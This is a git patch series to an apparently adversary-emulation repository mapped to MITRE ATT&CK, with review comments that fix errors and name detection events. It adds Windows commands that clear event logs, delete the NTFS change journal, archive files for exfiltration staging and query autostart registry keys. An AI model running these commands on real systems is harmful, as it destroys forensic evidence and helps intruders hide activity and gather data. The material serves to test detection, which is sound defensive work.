From 66c37e8b53b1bf4d5cadb342a50401e052d2b1ae Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 31 Oct 2017 12:56:52 -0700 Subject: [PATCH 1/2] Evasion and exfil + Added wevtutil and fsutil per what was used recently by BadBuddy Ransomware. + Added 2 ways to compress data with Powershell and rar. --- .../Defense Evasion/Indicator_Removal_on_Host.md | 14 ++++++++++++++ Windows/Exfiltration/Data_Compressed.md | 11 +++++++++++ 2 files changed, 25 insertions(+) create mode 100644 Windows/Exfiltration/Data_Compressed.md diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense Evasion/Indicator_Removal_on_Host.md index 635e4f78..5be6bba5 100644 --- a/Windows/Defense Evasion/Indicator_Removal_on_Host.md +++ b/Windows/Defense Evasion/Indicator_Removal_on_Host.md @@ -11,3 +11,17 @@ Clear system logs Clear Security logs wevtutil cl Security + +Clear Setup logs + + wevtutil cl Setup + +Clear Application logs + + wevtutil cl Application + +## Fsutil + +Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. + + fsutil usn deletejournal /D C: diff --git a/Windows/Exfiltration/Data_Compressed.md b/Windows/Exfiltration/Data_Compressed.md new file mode 100644 index 00000000..ac2307f9 --- /dev/null +++ b/Windows/Exfiltration/Data_Compressed.md @@ -0,0 +1,11 @@ +# File Deletion + +MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002) + +## PowerShell + + powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip + +## Rar + + rar a -r exfilthis.rar *.docx From be85bb6afeb99ea3afdd9ac67fd8bb8b0b8fc486 Mon Sep 17 00:00:00 2001 
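Review bot: the new `## Fsutil` section in Indicator_Removal_on_Host.md should say what the `/D` switch does and what footprint the command leaves: `fsutil usn deletejournal /D C:` deletes the NTFS change journal on C:, needs an elevated prompt, fails on non-NTFS volumes, and removes exactly the artifact a forensic file-system timeline relies on, so that belongs next to the one-line description. The wevtutil additions (`wevtutil cl Setup`, `wevtutil cl Application`) would likewise read better with their detection hook stated: clearing the Security log writes Event ID 1102 to the Security log, and clearing another log such as Setup or Application writes Event ID 104 to the System log, each recording the account that performed the clear, which is what a defender watching for this technique should alert on.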
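Review bot: the heading `# File Deletion` at the top of the new Data_Compressed.md is a copy-paste leftover and should be `# Data Compressed`, matching the file name and the T1002 link beneath it. Separately, the PowerShell line does not do what it describes when typed at a cmd.exe prompt: in `powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip` the `|` is consumed by cmd.exe, so `Compress-Archive` is started as a separate cmd command and never receives the file list. Wrap the whole pipeline in `-Command "..."`, or drop the `powershell.exe` prefix if the line is meant for a PowerShell prompt, and note that `Compress-Archive` is only available in PowerShell 5.0 and later.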
From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Tue, 31 Oct 2017 12:58:40 -0700 Subject: [PATCH 2/2] Discovery bat + Added reg queries to payload. --- Windows/Payloads/Discovery.bat | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Windows/Payloads/Discovery.bat b/Windows/Payloads/Discovery.bat index b7743df7..f11940f2 100644 --- a/Windows/Payloads/Discovery.bat +++ b/Windows/Payloads/Discovery.bat @@ -8,6 +8,23 @@ net config workstation net accounts net accounts /domain net view +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit +reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run wmic useraccount list wmic useraccount get /ALL wmic startup list brief
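Review bot: several of the added `reg query` lines in Discovery.bat will fail rather than return data. Only the first added line quotes its path; the `Windows NT` paths further down (`Winlogon\Notify`, `Winlogon\Userinit`, the two `Winlogon\\Shell` lines) are unquoted, so reg.exe splits them at the space and rejects the command; quote them the way the first line does. In addition, `Userinit` and `Shell` are values of the Winlogon key, not subkeys, so `...\Winlogon\Userinit` and `...\Winlogon\\Shell` (which also carries a doubled backslash) should become `reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit` and the corresponding `/v Shell` form for HKLM and HKCU. A short comment in the .bat naming the autostart category each group of keys covers would also help reviewers and defenders who baseline these same locations to spot gaps.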